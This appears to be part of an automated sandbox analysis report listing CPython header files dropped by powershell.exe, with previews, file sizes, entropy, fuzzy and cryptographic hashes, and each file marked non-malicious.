                              Preview:#ifndef Py_CPYTHON_LISTOBJECT_H..# error "this header file must not be included directly"..#endif....typedef struct {.. PyObject_VAR_HEAD.. /* Vector of pointers to list elements. list[0] is ob_item[0], etc. */.. PyObject **ob_item;.... /* ob_item contains space for 'allocated' elements. The number.. * currently in use is ob_size... * Invariants:.. * 0 <= ob_size <= allocated.. * len(list) == ob_size.. * ob_item == NULL implies ob_size == allocated == 0.. * list.sort() temporarily sets allocated to -1 to detect mutations... *.. * Items must normally not be NULL, except during construction when.. * the list is not yet visible outside the function that builds it... */.. Py_ssize_t allocated;..} PyListObject;....PyAPI_FUNC(PyObject *) _PyList_Extend(PyListObject *, PyObject *);..PyAPI_FUNC(void) _PyList_DebugMallocStats(FILE *out);..../* Cast argument to PyListObject* type. */..#define _PyList_CAST(op) \.. (assert(Py
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5022
                              Entropy (8bit):5.197921354121365
                              Encrypted:false
                              SSDEEP:48:IfiDJToXS7dco/1uKXHLKdUJfC5JxkM8UrJ4okJ4HYzXy9RSyHGJLrm9lYTBph3p:OiDJUo4KXrKSyjkMWoNHYbmScGT7VeKl
                              MD5:74823487B7F6BE5AC48BFC6103D150B3
                              SHA1:9859882BFB80C2D1756046415D4E250185D1687E
                              SHA-256:053452993BF183144BECB9EF4CD0293D51F022182CEF83C41BB0089DC2B0563D
                              SHA-512:1FD8F504305CA5C4201D8D829A71CA4877B555EACC84E49BBBE6D557E79BE7378289ED72D5529BF80A13CAEADC20864F548ACCC2790E627E19314ACF8A0D8493
                              Malicious:false
                              Preview:#ifndef Py_LIMITED_API..#ifndef Py_LONGINTREPR_H..#define Py_LONGINTREPR_H..#ifdef __cplusplus..extern "C" {..#endif....../* This is published for the benefit of "friends" marshal.c and _decimal.c. */..../* Parameters of the integer representation. There are two different.. sets of parameters: one set for 30-bit digits, stored in an unsigned 32-bit.. integer type, and one set for 15-bit digits with each digit stored in an.. unsigned short. The value of PYLONG_BITS_IN_DIGIT, defined either at.. configure time or in pyport.h, is used to decide which digit size to use..... Type 'digit' should be able to hold 2*PyLong_BASE-1, and type 'twodigits'.. should be an unsigned integer type able to hold all integers up to.. PyLong_BASE*PyLong_BASE-1. x_sub assumes that 'digit' is an unsigned type,.. and that overflow is handled by taking the result modulo 2**N for some N >.. PyLong_SHIFT. The majority of the code doesn't care about the precise.. value of PyLong_SHIFT, but t
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4779
                              Entropy (8bit):5.022578501994966
                              Encrypted:false
                              SSDEEP:96:fcj9um0J3q3D21C8YjnNSUbK45MvgDrPFZ27GK5SbfTZYQF3QfkDKbko6:05/AYjn4I5MvgDrPFZ2NqfTZYQxQMDQA
                              MD5:76A77068FAAB3F960E916EE115BCF625
                              SHA1:24F240C23CD6931EACF99C15E4A63B7F9E6F424E
                              SHA-256:E098266A6ABB52079966D12F04E34B419CCCA2D5E121F62ABCB523F867A7D972
                              SHA-512:B786E7AF8FE60D0C865B3B76DF74E7DB2395A79DEB22210F3A4A292729918B7E39BB33FEFAFB9A4957C5CAD79EE3E24ACA92B101B33D80257D3AA567AF5BEAF0
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_LONGOBJECT_H..# error "this header file must not be included directly"..#endif....PyAPI_FUNC(int) _PyLong_AsInt(PyObject *);....PyAPI_FUNC(int) _PyLong_UnsignedShort_Converter(PyObject *, void *);..PyAPI_FUNC(int) _PyLong_UnsignedInt_Converter(PyObject *, void *);..PyAPI_FUNC(int) _PyLong_UnsignedLong_Converter(PyObject *, void *);..PyAPI_FUNC(int) _PyLong_UnsignedLongLong_Converter(PyObject *, void *);..PyAPI_FUNC(int) _PyLong_Size_t_Converter(PyObject *, void *);..../* _PyLong_Frexp returns a double x and an exponent e such that the.. true value is approximately equal to x * 2**e. e is >= 0. x is.. 0.0 if and only if the input is 0 (in which case, e and x are both.. zeroes); otherwise, 0.5 <= abs(x) < 1.0. On overflow, which is.. possible if the number of bits doesn't fit into a Py_ssize_t, sets.. OverflowError and returns -1.0 for x, 0 for e. */..PyAPI_FUNC(double) _PyLong_Frexp(PyLongObject *a, Py_ssize_t *e);....PyAPI_FUNC(PyObject *) PyLong_FromUn
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2324
                              Entropy (8bit):5.1886231790241695
                              Encrypted:false
                              SSDEEP:48:mcgVeqkbYCfCrgNIYXZ0wbRar89MUBuZ27MZkZjedRc3X:mc4kMIn/Ddx9MUG2uijYRE
                              MD5:9A825F485A251686003D9229909C7000
                              SHA1:E714B79D7CF19589BAF296553437D1BA2DDA0B78
                              SHA-256:9FEECE501D4CD48E8F3A233DB4C46BB822A80376361BD5753E76B493CA3A78B8
                              SHA-512:A4E110730FC5F2729EA04362811F83849B0D40A47E2579D49FC268A3BBDB6DC5341B0F8AD838D3341C95B1EED57E09DCC11C935FEA7EC3C6469AA15E88120617
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_MEMORYOBJECT_H..# error "this header file must not be included directly"..#endif....PyAPI_DATA(PyTypeObject) _PyManagedBuffer_Type;..../* The structs are declared here so that macros can work, but they shouldn't.. be considered public. Don't access their fields directly, use the macros.. and functions instead! */..#define _Py_MANAGED_BUFFER_RELEASED 0x001 /* access to exporter blocked */..#define _Py_MANAGED_BUFFER_FREE_FORMAT 0x002 /* free format */....typedef struct {.. PyObject_HEAD.. int flags; /* state flags */.. Py_ssize_t exports; /* number of direct memoryview exports */.. Py_buffer master; /* snapshot buffer obtained from the original exporter */..} _PyManagedBufferObject;....../* memoryview state flags */..#define _Py_MEMORYVIEW_RELEASED 0x001 /* access to master buffer blocked */..#define _Py_MEMORYVIEW_C 0x002 /* C-contiguous layout */..#define _Py_MEMORYVIEW_FORTRAN 0x004 /* Fortran contiguous layout */.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2342
                              Entropy (8bit):5.182525087815372
                              Encrypted:false
                              SSDEEP:48:scgQlOn4dtx1HEvd7UEQ7zEH75lWIR2QLnEzapVnl9u8wWIReFPEzapVnxUmaR9X:scxT1HYd7UH7z+75MIR2IEgvPTIRcMg4
                              MD5:3E864CCED9C81ED0CCDD0D4623ABF286
                              SHA1:7F7AB10428BC3BDD687BE5A89CAAAD0A304D1ABB
                              SHA-256:38293361CBDFD45DF12E1893BF033C25F2FFE3D9DAD13B0FD3FCBC98C7997C49
                              SHA-512:46F24F8BAB51E99F83084F525C23F6AB7DF8E9B958FA49D54D6163CAD8A9F0DD026C8983021ABDFA425D9F88DD1C90A286CFEC8F0F6215C1B15199E124514C83
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_METHODOBJECT_H..# error "this header file must not be included directly"..#endif....// PyCFunctionObject structure....typedef struct {.. PyObject_HEAD.. PyMethodDef *m_ml; /* Description of the C function to call */.. PyObject *m_self; /* Passed as 'self' arg to the C func, can be NULL */.. PyObject *m_module; /* The __module__ attribute, can be anything */.. PyObject *m_weakreflist; /* List of weak references */.. vectorcallfunc vectorcall;..} PyCFunctionObject;....#define _PyCFunctionObject_CAST(func) \.. (assert(PyCFunction_Check(func)), \.. _Py_CAST(PyCFunctionObject*, (func)))......// PyCMethodObject structure....typedef struct {.. PyCFunctionObject func;.. PyTypeObject *mm_class; /* Class that defines this method */..} PyCMethodObject;....#define _PyCMethodObject_CAST(func) \.. (assert(PyCMethod_Check(func)), \.. _Py_CAST(PyCMethodObject*, (func)))....PyAPI_DATA(PyTypeObject) PyCMethod_Type;....#define PyCMethod_C
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4445
                              Entropy (8bit):5.05351456250695
                              Encrypted:false
                              SSDEEP:96:1cVTD7GW+jo5ea+vFI20+3k+PaPF36b2yHzV:Kh7GS5ea++LD36b2w
                              MD5:0FC62BC4A9D6795DAC7E83E55F204798
                              SHA1:A203F510EECDD8C44F226FA157180516E317B60F
                              SHA-256:3DC42D6F9801AFF80BBF0CBF847211A480E78CF4DFA49ECA3CE6A7A784DAF692
                              SHA-512:0217D7765833E82E23C217440BB7170469070FA8A557381286FA52C60716BAFC1059ADA59CE9B5BF3B9AC260E391F53B31BA1130B8C1330B1FCDF22C6861BD61
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_MODSUPPORT_H..# error "this header file must not be included directly"..#endif..../* If PY_SSIZE_T_CLEAN is defined, each functions treats #-specifier.. to mean Py_ssize_t */..#ifdef PY_SSIZE_T_CLEAN..#define _Py_VaBuildStack _Py_VaBuildStack_SizeT..#else..PyAPI_FUNC(PyObject *) _Py_VaBuildValue_SizeT(const char *, va_list);..PyAPI_FUNC(PyObject **) _Py_VaBuildStack_SizeT(.. PyObject **small_stack,.. Py_ssize_t small_stack_len,.. const char *format,.. va_list va,.. Py_ssize_t *p_nargs);..#endif....PyAPI_FUNC(int) _PyArg_UnpackStack(.. PyObject *const *args,.. Py_ssize_t nargs,.. const char *name,.. Py_ssize_t min,.. Py_ssize_t max,.. ...);....PyAPI_FUNC(int) _PyArg_NoKeywords(const char *funcname, PyObject *kwargs);..PyAPI_FUNC(int) _PyArg_NoKwnames(const char *funcname, PyObject *kwnames);..PyAPI_FUNC(int) _PyArg_NoPositional(const char *funcname, PyObject *args);..#define _PyArg_NoKeywords(funcname, kwargs) \..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):21787
                              Entropy (8bit):5.058391137738562
                              Encrypted:false
                              SSDEEP:384:OgHDxPOeSmmqRrVqH7FeEKyH0qLIoPXY2Lwvu95IWawvc95IWKzYv8Z7v2L2Xkui:OgHdOWmqqHXH0YXZd/S/KzYvoD2L2XkZ
                              MD5:DB36423AA52F401070332AC25A6A7432
                              SHA1:E20536B95CD39BE7FD1660A758D9E6A060056717
                              SHA-256:82EC2077CD103254A2D366CD857E4C734DD261FD750FA39940A3E4975CF8D616
                              SHA-512:D78CB02D0F19CA8313065D755B8ACDDFE530BF946AA027E0560E2FC44818FCA797AC9982E444FFEDBA1E6074B7BF8C59F9D66CAD2DF88EC3A9A4317D6D96ED2E
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_OBJECT_H..# error "this header file must not be included directly"..#endif....PyAPI_FUNC(void) _Py_NewReference(PyObject *op);..PyAPI_FUNC(void) _Py_NewReferenceNoTotal(PyObject *op);....#ifdef Py_TRACE_REFS../* Py_TRACE_REFS is such major surgery that we call external routines. */..PyAPI_FUNC(void) _Py_ForgetReference(PyObject *);..#endif....#ifdef Py_REF_DEBUG../* These are useful as debugging aids when chasing down refleaks. */..PyAPI_FUNC(Py_ssize_t) _Py_GetGlobalRefTotal(void);..# define _Py_GetRefTotal() _Py_GetGlobalRefTotal()..PyAPI_FUNC(Py_ssize_t) _Py_GetLegacyRefTotal(void);..PyAPI_FUNC(Py_ssize_t) _PyInterpreterState_GetRefTotal(PyInterpreterState *);..#endif....../********************* String Literals ****************************************/../* This structure helps managing static strings. The basic usage goes like this:.. Instead of doing.... r = PyObject_CallMethod(o, "foo", "args", ...);.... do.... _Py_IDENTIFIER(foo);.. ....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):3411
                              Entropy (8bit):5.0684324671002665
                              Encrypted:false
                              SSDEEP:96:5ccuRtVM6X5Oint5LRqe2TCjPKsTW7QALGsL2V+F7I26:2cuRjMYoizRqe2T5sT0Q2CV+FM26
                              MD5:3AAF56D62D3B0F11B109ABAE1037D3E4
                              SHA1:F965A602F9F9577EDC4C63CCFDEEEDE17BFDE202
                              SHA-256:1A6FE8DD3E89B288DE512CB87DD6BD583D8B5AA4B985BFC0567C6BDA983C4554
                              SHA-512:23F9E71F2861CB984238C59A68C7C9BC1DCD5481D16CA1DE1C8D1F16DCBB686C1D63E8DE2A323F4EAA2E1801D8299B2E841ABCD8DADE450D9AF5D956E994D024
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_OBJIMPL_H..# error "this header file must not be included directly"..#endif....static inline size_t _PyObject_SIZE(PyTypeObject *type) {.. return _Py_STATIC_CAST(size_t, type->tp_basicsize);..}..../* _PyObject_VAR_SIZE returns the number of bytes (as size_t) allocated for a.. vrbl-size object with nitems items, exclusive of gc overhead (if any). The.. value is rounded up to the closest multiple of sizeof(void *), in order to.. ensure that pointer fields at the end of the object are correctly aligned.. for the platform (this is of special importance for subclasses of, e.g.,.. str or int, so that pointers can be stored after the embedded data)..... Note that there's no memory wastage in doing this, as malloc has to.. return (at worst) pointer-aligned memory anyway...*/..#if ((SIZEOF_VOID_P - 1) & SIZEOF_VOID_P) != 0..# error "_PyObject_VAR_SIZE requires SIZEOF_VOID_P be a power of 2"..#endif....static inline size_t _PyObject_VAR_SIZE(PyTypeObject *
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1354
                              Entropy (8bit):5.183460169106451
                              Encrypted:false
                              SSDEEP:12:BOpgldiy2tuYrCJLrox9tLNQIY3ncGEWKMS5nHqG+u35XXPgF8waXQijTab:0W3/2sH6x9t+FE2CnKG/toF8zjab
                              MD5:6BB61C20651C43AF4A1FEAEAC50B525C
                              SHA1:5B4356F048F9385195878B9EA14A3B6044890219
                              SHA-256:1C53B02FCE72611A21A403CE367903DDB21F523965179AE5C77D3281EEC1D696
                              SHA-512:23A1F65CE542704D84879F6391010881F0F04B799EF9D56CA96D0B6A464F7ACB6A8D9FAB5FBC33D0A306A9849982F5EFA21A5F23A8A5ED4E332172CF85720085
                              Malicious:false
                              Preview:#ifndef Py_ODICTOBJECT_H..#define Py_ODICTOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....../* OrderedDict */../* This API is optional and mostly redundant. */....#ifndef Py_LIMITED_API....typedef struct _odictobject PyODictObject;....PyAPI_DATA(PyTypeObject) PyODict_Type;..PyAPI_DATA(PyTypeObject) PyODictIter_Type;..PyAPI_DATA(PyTypeObject) PyODictKeys_Type;..PyAPI_DATA(PyTypeObject) PyODictItems_Type;..PyAPI_DATA(PyTypeObject) PyODictValues_Type;....#define PyODict_Check(op) PyObject_TypeCheck((op), &PyODict_Type)..#define PyODict_CheckExact(op) Py_IS_TYPE((op), &PyODict_Type)..#define PyODict_SIZE(op) PyDict_GET_SIZE((op))....PyAPI_FUNC(PyObject *) PyODict_New(void);..PyAPI_FUNC(int) PyODict_SetItem(PyObject *od, PyObject *key, PyObject *item);..PyAPI_FUNC(int) PyODict_DelItem(PyObject *od, PyObject *key);..../* wrappers around PyDict* functions */..#define PyODict_GetItem(od, key) PyDict_GetItem(_PyObject_CAST(od), (key))..#define PyODict_GetItemWithError(od, key) \.. PyDi
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):879
                              Entropy (8bit):5.267148701395894
                              Encrypted:false
                              SSDEEP:12:UPpna5ooK5reGc4q4rCJ/2p2p2IYQSpdR9p0zFnCp1ep5wyKZDBpsPpQ/6EjZpuK:Z5XKc4sFG43Od//6l/Ul
                              MD5:A4C31AF078BC034992677A5AA57E3538
                              SHA1:20AE77034D5E188C0948F915E7FB5D5DD8F797B1
                              SHA-256:ECB05C81E6EC87A0442DD01FAA6DEA7FF10C81555CB43A8D9D5A0A2EA7E3BE92
                              SHA-512:F70D3C6D2B83E91E0D274A0D414BC3522509BB184D12FBFAA8370F2250FE5DB13B44D4B60AAB8BC05B6CA52C4D17286E0716F74A96EE16FD3CCD727548A2C32A
                              Malicious:false
                              Preview:/* PickleBuffer object. This is built-in for ease of use from third-party.. * C extensions... */....#ifndef Py_PICKLEBUFOBJECT_H..#define Py_PICKLEBUFOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_LIMITED_API....PyAPI_DATA(PyTypeObject) PyPickleBuffer_Type;....#define PyPickleBuffer_Check(op) Py_IS_TYPE((op), &PyPickleBuffer_Type)..../* Create a PickleBuffer redirecting to the given buffer-enabled object */..PyAPI_FUNC(PyObject *) PyPickleBuffer_FromObject(PyObject *);../* Get the PickleBuffer's underlying view to the original object.. * (NULL if released).. */..PyAPI_FUNC(const Py_buffer *) PyPickleBuffer_GetBuffer(PyObject *);../* Release the PickleBuffer. Returns 0 on success, -1 on error. */..PyAPI_FUNC(int) PyPickleBuffer_Release(PyObject *);....#endif /* !Py_LIMITED_API */....#ifdef __cplusplus..}..#endif..#endif /* !Py_PICKLEBUFOBJECT_H */..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):3593
                              Entropy (8bit):4.90105688574451
                              Encrypted:false
                              SSDEEP:48:Ul3OVclerU8SXnA9mpbB0CD0cEQx9BX4GRm461PbVX58TXsDzz:UZOVcBB7IcEQx9BX4GRm46nGXsT
                              MD5:5042956670A8ECA4C543D14B62A8063C
                              SHA1:A023CB5E91870D50CD1222D5F0DDF90EBD408E6A
                              SHA-256:125515BD49C0BBEFBE7B9A4219EE0F671C70E5E8052277DD1BBB00E08DA76F8F
                              SHA-512:7A8795E604886B6C344CAD2596872149B1346A8DE86B86063DCB3F258F8D744502B9D94E501723390FA074B06DBDACC4A7FF7079DB022CF8B9A16A40D827C50E
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_PTRHEAD_STUBS_H..#define Py_CPYTHON_PTRHEAD_STUBS_H....#if !defined(HAVE_PTHREAD_STUBS)..# error "this header file requires stubbed pthreads."..#endif....#ifndef _POSIX_THREADS..# define _POSIX_THREADS 1..#endif..../* Minimal pthread stubs for CPython... *.. * The stubs implement the minimum pthread API for CPython... * - pthread_create() fails... * - pthread_exit() calls exit(0)... * - pthread_key_*() functions implement minimal TSS without destructor... * - all other functions do nothing and return 0... */....#ifdef __wasi__..// WASI's bits/alltypes.h provides type definitions when __NEED_ is set...// The header file can be included multiple times...# define __NEED_pthread_cond_t 1..# define __NEED_pthread_condattr_t 1..# define __NEED_pthread_mutex_t 1..# define __NEED_pthread_mutexattr_t 1..# define __NEED_pthread_key_t 1..# define __NEED_pthread_t 1..# define __NEED_pthread_attr_t 1..# include <bits/alltypes.h>..#else..typedef struct { void *__x; } pth
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1426
                              Entropy (8bit):5.414626346930993
                              Encrypted:false
                              SSDEEP:24:oUIMUhanrrI1lE2gM6CS5XphKLPIQIG8ImINPxIBIsI2fBAv2Er1ZW:EMUhannI1lEkuXsIQILImIN5IBIsIgB5
                              MD5:91891583393561856B0C66D384A1B6E9
                              SHA1:6816BAB590022535ED637B1A7FAD8A5DD4C8B33F
                              SHA-256:5B0CF2697E86E054D0A0721670D0A8E0318ED9ACB05EA0E93CD543E263F2F97A
                              SHA-512:616949A2566F0FEB26C12B2106A3BBFA1CF8BFC8686E75CAE0A5DF679626A06FD7A83364DC4D908993CF12AA300A75A0EE87496A7B66EF7B165369470B06CC03
                              Malicious:false
                              Preview:#ifndef Py_LIMITED_API..#ifndef PYCTYPE_H..#define PYCTYPE_H..#ifdef __cplusplus..extern "C" {..#endif....#define PY_CTF_LOWER 0x01..#define PY_CTF_UPPER 0x02..#define PY_CTF_ALPHA (PY_CTF_LOWER|PY_CTF_UPPER)..#define PY_CTF_DIGIT 0x04..#define PY_CTF_ALNUM (PY_CTF_ALPHA|PY_CTF_DIGIT)..#define PY_CTF_SPACE 0x08..#define PY_CTF_XDIGIT 0x10....PyAPI_DATA(const unsigned int) _Py_ctype_table[256];..../* Unlike their C counterparts, the following macros are not meant to.. * handle an int with any of the values [EOF, 0-UCHAR_MAX]. The argument.. * must be a signed/unsigned char. */..#define Py_ISLOWER(c) (_Py_ctype_table[Py_CHARMASK(c)] & PY_CTF_LOWER)..#define Py_ISUPPER(c) (_Py_ctype_table[Py_CHARMASK(c)] & PY_CTF_UPPER)..#define Py_ISALPHA(c) (_Py_ctype_table[Py_CHARMASK(c)] & PY_CTF_ALPHA)..#define Py_ISDIGIT(c) (_Py_ctype_table[Py_CHARMASK(c)] & PY_CTF_DIGIT)..#define Py_ISXDIGIT(c) (_Py_ctype_table[Py_CHARMASK(c)] & PY_CTF_XDIGIT)..#define Py_ISALNUM(c) (_Py_ctype_table[Py_C
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1451
                              Entropy (8bit):5.316330902074438
                              Encrypted:false
                              SSDEEP:24:ohgc9wFHjttJJutAjI/O/qsDva65TAIN0OgxcKkubNJUg8:Qf9wFHjttJItAjMO/bDvaGXN0dkGNp8
                              MD5:AF8BC9EFAD59DF43AF0AB0916983E807
                              SHA1:F13FF49E7B7117D0D4C3D87FFB4EB53BEBED61F3
                              SHA-256:3A12471FFF6DC26957CC4C8A540D291B1DBB4D1CA1E2181538272520CBBC5077
                              SHA-512:BC75CAD4387204F8D4B466E1EBD8F7BCEFD3BF31A180B182B631A6CEAA680FEBB16DD54916547BD3E30CDFAE08C0F48D6676B71F33863693A03BB97E956C0186
                              Malicious:false
                              Preview:#ifndef Py_LIMITED_API..#ifndef Py_PYDEBUG_H..#define Py_PYDEBUG_H..#ifdef __cplusplus..extern "C" {..#endif....Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_DebugFlag;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_VerboseFlag;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_QuietFlag;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_InteractiveFlag;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_InspectFlag;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_OptimizeFlag;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_NoSiteFlag;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_BytesWarningFlag;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_FrozenFlag;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_IgnoreEnvironmentFlag;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_DontWriteBytecodeFlag;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_NoUserSiteDirectory;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_UnbufferedStdioFlag;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_HashRandomizationFlag;..Py_DEPRECATED(3.12) PyAPI_DATA(int) Py_IsolatedFlag;....#ifdef MS_WINDOWS..Py_DEPRECATED(3.12) P
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4454
                              Entropy (8bit):5.035902312634121
                              Encrypted:false
                              SSDEEP:96:dHcbUkGrBZcmQ4xTmCHijFHd+vqALj5CpJQCupUDuUe:ObJOZcDcqCHQBsNH5CHQCupUDuUe
                              MD5:864B9D08D0E1F82FB1752036D44E0D6F
                              SHA1:0617481BC794800CEB0030E5D757B7BBC858D14D
                              SHA-256:51F18CC3DB616DD36AF97D54471D31557BFAD155CFCF65875CB8F4954CF1566E
                              SHA-512:78ED571BB9FDEA3BC5504BBC5E6C039C114C1D7C5867435A06C3DD91A77989B128348C2444481A7D3AD36B0A5940F4E594AC4812B97E715749ED8E509AE717A4
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_ERRORS_H..# error "this header file must not be included directly"..#endif..../* Error objects */..../* PyException_HEAD defines the initial segment of every exception class. */..#define PyException_HEAD PyObject_HEAD PyObject *dict;\.. PyObject *args; PyObject *notes; PyObject *traceback;\.. PyObject *context; PyObject *cause;\.. char suppress_context;....typedef struct {.. PyException_HEAD..} PyBaseExceptionObject;....typedef struct {.. PyException_HEAD.. PyObject *msg;.. PyObject *excs;..} PyBaseExceptionGroupObject;....typedef struct {.. PyException_HEAD.. PyObject *msg;.. PyObject *filename;.. PyObject *lineno;.. PyObject *offset;.. PyObject *end_lineno;.. PyObject *end_offset;.. PyObject *text;.. PyObject *print_file_and_line;..} PySyntaxErrorObject;....typedef struct {.. PyException_HEAD.. PyObject *msg;.. PyObject *name;.. PyObject *path;.. PyObject *name_from;..} PyImp
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):459
                              Entropy (8bit):5.152600348696546
                              Encrypted:false
                              SSDEEP:12:BemmYxSnlF9rrCJp5NA1Jocl4WWWVsE2I0cD:LmYMMLA1xhWTjI0cD
                              MD5:BBC7515EBD44C181429DE06707AA39E0
                              SHA1:3948330184B82E3BFB6390D0740B1F43A67CA1DD
                              SHA-256:B8B42E4F39DBC5F267E8E1FF0C4A52B431A422E6CB58C2380826A0C478334316
                              SHA-512:A4E6AF8F865B45A81D842558277382FFF5357EC6B97ABBBB5D6AC2D25942EEFACF321CE58615A3112D799CECD4AE9AB32CAE6D1B725A92A40797D2FD80C9622A
                              Malicious:false
                              Preview:#ifndef Py_PYFPE_H..#define Py_PYFPE_H../* Header excluded from the stable API */..#ifndef Py_LIMITED_API..../* These macros used to do something when Python was built with --with-fpectl,.. * but support for that was dropped in 3.7. We continue to define them though,.. * to avoid breaking API users... */....#define PyFPE_START_PROTECT(err_string, leave_stmt)..#define PyFPE_END_PROTECT(v)....#endif /* !defined(Py_LIMITED_API) */..#endif /* !Py_PYFPE_H */..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1514
                              Entropy (8bit):5.057379170402737
                              Encrypted:false
                              SSDEEP:24:+wxibxSWidC7/VKwCfmC7C2gLS7tEVWMpKxNJ0Hl5vGDbHG5tF6i3HG5kP:+cgxrqC7/vCfmC7C2gW73Mwxozvcut4+
                              MD5:C1A0DC707BC3107F9EB2C6E5315E2DDF
                              SHA1:FBC2E034644EA40C95D5F69615C7FA90DA38EAD1
                              SHA-256:A7135A048A548202B90582D5F39FF7BCB4456861D4C69640F844A86284F31031
                              SHA-512:F6C8593A05706D9ED6C4A3CB046425324EB4FDA675A29F68801DFB0C6AB8BB92E80E41D1A74627F3A0C4FE053F5D464AB1B3DB575756403FF0A70578510E3ABC
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_PYFRAME_H..# error "this header file must not be included directly"..#endif....PyAPI_DATA(PyTypeObject) PyFrame_Type;....#define PyFrame_Check(op) Py_IS_TYPE((op), &PyFrame_Type)....PyAPI_FUNC(PyFrameObject *) PyFrame_GetBack(PyFrameObject *frame);..PyAPI_FUNC(PyObject *) PyFrame_GetLocals(PyFrameObject *frame);....PyAPI_FUNC(PyObject *) PyFrame_GetGlobals(PyFrameObject *frame);..PyAPI_FUNC(PyObject *) PyFrame_GetBuiltins(PyFrameObject *frame);....PyAPI_FUNC(PyObject *) PyFrame_GetGenerator(PyFrameObject *frame);..PyAPI_FUNC(int) PyFrame_GetLasti(PyFrameObject *frame);..PyAPI_FUNC(PyObject*) PyFrame_GetVar(PyFrameObject *frame, PyObject *name);..PyAPI_FUNC(PyObject*) PyFrame_GetVarString(PyFrameObject *frame, const char *name);..../* The following functions are for use by debuggers and other tools.. * implementing custom frame evaluators with PEP 523. */....struct _PyInterpreterFrame;..../* Returns the code object of the frame (strong reference)... * Does not raise
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):3534
                              Entropy (8bit):5.19569784275282
                              Encrypted:false
                              SSDEEP:48:PcgTHHiDGIa4t3zL1D/PWchz/cl/4j/JNtDb4O8RS4VC+7B4MQXStYZ:PcyiDGInzZDPWiOAj/Dp8Mc7BGXSuZ
                              MD5:13A99D2EB897AED79A2CD18BEF9A7E27
                              SHA1:FFF48239E805411C7C0B4831DCF4E700FEC2AF06
                              SHA-256:E3D38D7856B32348F7DFFEDDDF1BA9B65749D7C71BBB931877C33559636B32B2
                              SHA-512:02E319424ABE45A848E976AB21E6BBA2DF10AAF3A5E3CF3F628186C01A4217AA0E81575690C4BFF06DE50A67457F06A34ED5041FE630B8A82202728B667DBCA5
                              Malicious:false
